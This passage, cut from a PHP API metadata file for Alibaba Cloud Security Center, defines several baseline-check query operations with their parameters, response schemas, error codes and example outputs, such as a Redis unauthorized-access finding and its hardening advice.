'9693CBA1-1EC4-5B5A-8D96-34010D9DXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeCheckWarningCount', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckWarningCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Count\\": 4,\\n \\"RequestId\\": \\"9693CBA1-1EC4-5B5A-8D96-34010D9DXXXX\\"\\n}","type":"json"}]', ], 'DescribeCheckWarningDetail' => [ 'summary' => 'Queries the details of a specified check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '103.25.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CheckWarningId', 'in' => 'query', 'schema' => ['description' => 'The alert ID of the check item.'."\n" ."\n" .'> To query the details of a specified check item, provide the alert ID of the check item. You can call the [DescribeCheckWarnings](~~DescribeCheckWarnings~~) operation to obtain this ID.'."\n" .'>This parameter is required when both Uuid and CheckId are empty.>', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '98675301', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'>You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.>When this parameter is specified, the CheckId parameter is required.>', 'type' => 'string', 'required' => false, 'example' => '06125d19-6a02-4451-9f65-2083996e****', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" .'> You can call the [ListCheckItemWarningSummary](~~ListCheckItemWarningSummary~~) operation to obtain the check item ID.>When this parameter is specified, the Uuid parameter is required.>', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ContainerName', 'in' => 'query', 'schema' => ['description' => 'The container name.', 'type' => 'string', 'required' => false, 'example' => 'test_container', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Advice' => ['description' => 'The hardening suggestion for the baseline check risk item.', 'type' => 'string', 'example' => 'You can fix it in the following ways:↵1. To configure authentication for redis service, click the redis.conf Configure complex password in requirepass, and then restart redis.↵2. In redis configuration file redis.conf The configuration is as follows: bind 127.0.0.1, only allow local access, and then restart redis', 'title' => ''], 'Type' => ['description' => 'The type of the baseline check item.'."\n" .'> You can call the [DescribeRiskType](~~DescribeRiskType~~) operation to view all baseline types.', 'type' => 'string', 'example' => 'Security audit', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'Description' => ['description' => 'The supplementary description of the baseline check risk item.', 'type' => 'string', 'example' => 'The redis port is open to the outside world and there is no authentication option configured. In addition to directly obtaining all the information in the database, unauthorized users can also attack the system through unauthorized access vulnerability.', 'title' => ''], 'Item' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'Redis unauthorized access', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '946', 'title' => ''], 'Level' => ['description' => 'The risk level of the check item. Valid values:'."\n" ."\n" .'- **high**: High risk, highlighted in red.'."\n" ."\n" .'- **medium**: Medium risk, highlighted in orange.'."\n" ."\n" .'- **low**: Low risk, highlighted in gray.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'Prompt' => ['description' => 'The check prompt for the baseline check risk item.', 'type' => 'string', 'example' => 'weak passwords (username@host/password):root@****/12***', 'title' => ''], 'CheckDetailColumns' => [ 'description' => 'The check content details.', 'type' => 'array', 'items' => [ 'description' => 'The check content details.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The display type. Valid values:'."\n" .'- **grid**: check grid'."\n" .'- **text**: text', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Key' => ['description' => 'The key of the check content.', 'type' => 'string', 'example' => 'Containername', 'title' => ''], 'ShowName' => ['description' => 'The display name corresponding to the check content key.', 'type' => 'string', 'example' => 'ContainerName', 'title' => ''], 'Grids' => [ 'description' => 'The list of check content.', 'type' => 'array', 'items' => [ 'description' => 'The check content.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The display type. Valid values:'."\n" .'- **grid**: check grid'."\n" .'- **text**: text', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Key' => ['description' => 'The key of the check content.', 'type' => 'string', 'example' => 'Username', 'title' => ''], 'ShowName' => ['description' => 'The display name corresponding to the check content key.', 'type' => 'string', 'example' => 'UserName', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'CheckDetailAssetInfo' => [ 'description' => 'The list of checked asset details.', 'type' => 'array', 'items' => [ 'description' => 'The checked asset details.', 'type' => 'object', 'additionalProperties' => ['description' => 'The check asset details.', 'type' => 'string', 'example' => '[{"Containerid":"8ee88e****","Containername":"jenkins-birdge","WeakPasswords":[{"Username":"admin","Maskweakpassword":"1qaz****23"}]}]', 'title' => ''], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query details of a specified check item', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckWarningDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Advice\\": \\"You can fix it in the following ways:↵1. To configure authentication for redis service, click the redis.conf Configure complex password in requirepass, and then restart redis.↵2. In redis configuration file redis.conf The configuration is as follows: bind 127.0.0.1, only allow local access, and then restart redis\\",\\n \\"Type\\": \\"Security audit\\",\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"Description\\": \\"The redis port is open to the outside world and there is no authentication option configured. In addition to directly obtaining all the information in the database, unauthorized users can also attack the system through unauthorized access vulnerability.\\",\\n \\"Item\\": \\"Redis unauthorized access\\",\\n \\"CheckId\\": 946,\\n \\"Level\\": \\"high\\",\\n \\"Prompt\\": \\"weak passwords (username@host/password):root@****/12***\\",\\n \\"CheckDetailColumns\\": [\\n {\\n \\"Type\\": \\"text\\",\\n \\"Key\\": \\"Containername\\",\\n \\"ShowName\\": \\"ContainerName\\",\\n \\"Grids\\": [\\n {\\n \\"Type\\": \\"text\\",\\n \\"Key\\": \\"Username\\",\\n \\"ShowName\\": \\"UserName\\"\\n }\\n ]\\n }\\n ],\\n \\"CheckDetailAssetInfo\\": [\\n {\\n \\"key\\": \\"[{\\\\\\"Containerid\\\\\\":\\\\\\"8ee88e****\\\\\\",\\\\\\"Containername\\\\\\":\\\\\\"jenkins-birdge\\\\\\",\\\\\\"WeakPasswords\\\\\\":[{\\\\\\"Username\\\\\\":\\\\\\"admin\\\\\\",\\\\\\"Maskweakpassword\\\\\\":\\\\\\"1qaz****23\\\\\\"}]}]\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCheckWarningMachines' => [ 'summary' => 'Queries the servers on which the same risk item is detected by specifying a baseline and a check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '144227', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to query the IDs of baselines.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '43', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to query the IDs of check items.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '58', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The risk status of the check item. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **3**: passed'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The information about the server that you want to query. The value can be the name or the public IP address of the server.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cri-rv4nvbv8iju4****', 'title' => ''], ], [ 'name' => 'FilterUuid', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset that you don\'t want to query.', 'type' => 'string', 'required' => false, 'example' => '2f64e1a0f9316c48*******', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'ListResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Machines' => [ 'description' => 'The servers on which the same risk item is detected.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the server.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA0****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.'."\n", 'type' => 'string', 'example' => 'test****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'example' => 'i-bp1dp42hgn1xcq8l****', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region in which the server resides.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Bind' => ['description' => 'Indicates whether Security Center is authorized to protect the asset. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of the servers on which the same risk item is detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'B3D989EB-2E59-584C-8438-5DFAA34A****', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'CurrentPage' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'DescribeCheckWarningMachines', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningMachines'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckWarningMachines', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Machines\\": [\\n {\\n \\"Uuid\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA0****\\",\\n \\"InstanceName\\": \\"test****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"InstanceId\\": \\"i-bp1dp42hgn1xcq8l****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Bind\\": true\\n }\\n ],\\n \\"Count\\": 10,\\n \\"RequestId\\": \\"B3D989EB-2E59-584C-8438-5DFAA34A****\\",\\n \\"PageSize\\": 20,\\n \\"CurrentPage\\": 1\\n}","type":"json"}]', ], 'DescribeCheckWarningSummary' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '219.133.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'TypeName', 'in' => 'query', 'schema' => ['description' => 'The level-1 type of the baseline.'."\n" .'> Call the [DescribeRiskType](~~DescribeRiskType~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'database', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the check item. Valid values:'."\n" .'- **1**: failed'."\n" .'- **2**: verifying '."\n" .'- **3**: passed '."\n" .'- **5**: expired '."\n" .'- **6**: ignored.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RiskStatus', 'in' => 'query', 'schema' => ['description' => 'The status of the baseline check. Valid values:'."\n" .'- **1**: failed '."\n" .'- **3**: passed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RiskName', 'in' => 'query', 'schema' => ['description' => 'The name of the baseline check risk item.', 'type' => 'string', 'required' => false, 'example' => 'Redis', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'f03259d8-1e81-4fae-bcbb-275fb5****', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> Call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c80dae73bd1be442699766b14ffd0****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The container field. Valid values:'."\n" ."\n" .'- **clusterId**: cluster ID'."\n" .'- **image**: image name'."\n" .'- **imageId**: image ID'."\n" .'- **namespace**: namespace.', 'type' => 'string', 'required' => false, 'example' => 'namespace', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the container field.', 'type' => 'string', 'required' => false, 'example' => 'c819391d2d520485fa3e81e2dc2ea****', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The query type. Valid values:'."\n" .'- **uuid**: asset ID.', 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The group ID of the server to query.'."\n" .'> Call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to obtain the group ID of the server.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number of the returned results.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '00BD7CE2-284A-4534-BD09-FB69836DD750', 'title' => ''], 'TotalCount' => ['description' => 'The total number of baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of check items displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'WarningSummarys' => [ 'description' => 'The statistics of check items.', 'type' => 'array', 'items' => [ 'description' => 'The statistics of check items.', 'type' => 'object', 'properties' => [ 'LowWarningCount' => ['description' => 'The number of low-risk check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'CheckCount' => ['description' => 'The number of baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'MediumWarningCount' => ['description' => 'The number of medium-risk check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'LastFoundTime' => ['description' => 'The time when the last baseline check was performed.', 'type' => 'string', 'example' => '2019-01-01 12:23:00', 'title' => ''], 'RiskId' => ['description' => 'The ID of the risk item.', 'type' => 'integer', 'format' => 'int64', 'example' => '118', 'title' => ''], 'SubTypeAlias' => ['description' => 'The level-2 category of the risk item.', 'type' => 'string', 'example' => 'Redis', 'title' => ''], 'WarningMachineCount' => ['description' => 'The number of assets on which baseline risks are detected.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'HighWarningCount' => ['description' => 'The number of high-risk check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TypeAlias' => ['description' => 'The category of the baseline check item, such as database, system, weak password detection, and middleware.', 'type' => 'string', 'example' => 'databases', 'title' => ''], 'RiskName' => ['description' => 'The name of the baseline check risk item.', 'type' => 'string', 'example' => 'Redis', 'title' => ''], 'Level' => ['description' => 'The risk level of the baseline check risk item. Valid values:'."\n" ."\n" .'- **high**: high'."\n" .'- **medium**: medium'."\n" .'- **low**: low.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'CheckExploit' => ['description' => 'Indicates whether the risk item is exploitable. Valid values:'."\n" .'- **true**: exploitable'."\n" .'- **false**: not exploitable.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'DatabaseRisk' => ['description' => 'Indicates whether the risk item is a database risk. Valid values:'."\n" ."\n" .'- **true**: yes'."\n" .'- **false**: no.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'ContainerRisk' => ['description' => 'Indicates whether the baseline belongs to the container runtime category. Valid values:'."\n" .'- **true**: yes'."\n" .'- **false**: no.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query baseline check result statistics', 'summary' => 'Queries the statistics of baseline check results, such as the number of servers checked, the number of check items, and the latest check pass rate.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckWarningSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"RequestId\\": \\"00BD7CE2-284A-4534-BD09-FB69836DD750\\",\\n \\"TotalCount\\": 100,\\n \\"Count\\": 10,\\n \\"WarningSummarys\\": [\\n {\\n \\"LowWarningCount\\": 3,\\n \\"CheckCount\\": 10,\\n \\"MediumWarningCount\\": 2,\\n \\"LastFoundTime\\": \\"2019-01-01 12:23:00\\",\\n \\"RiskId\\": 118,\\n \\"SubTypeAlias\\": \\"Redis\\",\\n \\"WarningMachineCount\\": 11,\\n \\"HighWarningCount\\": 1,\\n \\"TypeAlias\\": \\"databases\\",\\n \\"RiskName\\": \\"Redis\\",\\n \\"Level\\": \\"high\\",\\n \\"CheckExploit\\": false,\\n \\"DatabaseRisk\\": false,\\n \\"ContainerRisk\\": false\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCheckWarnings' => [ 'summary' => 'Queries check item information for a specified risk item and a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The ID of the server on which the baseline check is performed.'."\n" ."\n" .'> To query check item information for a specified risk item and a specified server, you must provide the ID of the server on which the baseline check is performed. You can call the [DescribeWarningMachines](~~DescribeWarningMachines~~) operation to obtain this ID.', 'type' => 'string', 'required' => true, 'example' => 'd42f938c-d962-48a0-90f9-05****', 'title' => ''], ], [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The risk item ID. This parameter is required.'."\n" ."\n" .'> To query check item information for a specified risk item and a specified server, you must provide the risk item ID. You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to obtain this ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '10354', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of check items to display on each page in a paged query. Default value: **20**, which indicates that 20 check items are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2546', 'title' => ''], ], [ 'name' => 'CheckType', 'in' => 'query', 'schema' => ['description' => 'The type of the check item. Valid values:'."\n" ."\n" .'- **hc.check.type.identity_auth**: identity authentication'."\n" .'- **hc.check.type.access_control**: access control'."\n" .'- **hc.check.type.network_service**: network and service'."\n" .'- **hc.check.type.service_conf**: service configuration'."\n" .'- **hc.check.type.file_rights**: file permission'."\n" .'- **hc.check.type.security_audit**: security audit'."\n" .'- **hc.check.type.attack_defense**: intrusion prevention'."\n" .'- **hc.check.type.others**: others.', 'type' => 'string', 'required' => false, 'example' => 'hc.check.type.attack_defense', 'title' => ''], ], [ 'name' => 'RiskStatus', 'in' => 'query', 'schema' => ['description' => 'The risk detection status. Valid values:'."\n" ."\n" .'- **1**: failed'."\n" .'- **2**: verifying'."\n" .'- **3**: passed'."\n" .'- **5**: expired'."\n" .'- **6**: ignored.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ContainerName', 'in' => 'query', 'schema' => ['description' => 'The container name.', 'type' => 'string', 'required' => false, 'example' => '/redis', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'> You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of check items displayed on each page in a paged query. Default value: **20**, which indicates that 20 check items are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '0DFCADBA-7065-42DA-AF17-6868B9C2A8CF', 'title' => ''], 'TotalCount' => ['description' => 'The total number of check items returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of check items displayed on the current page.', 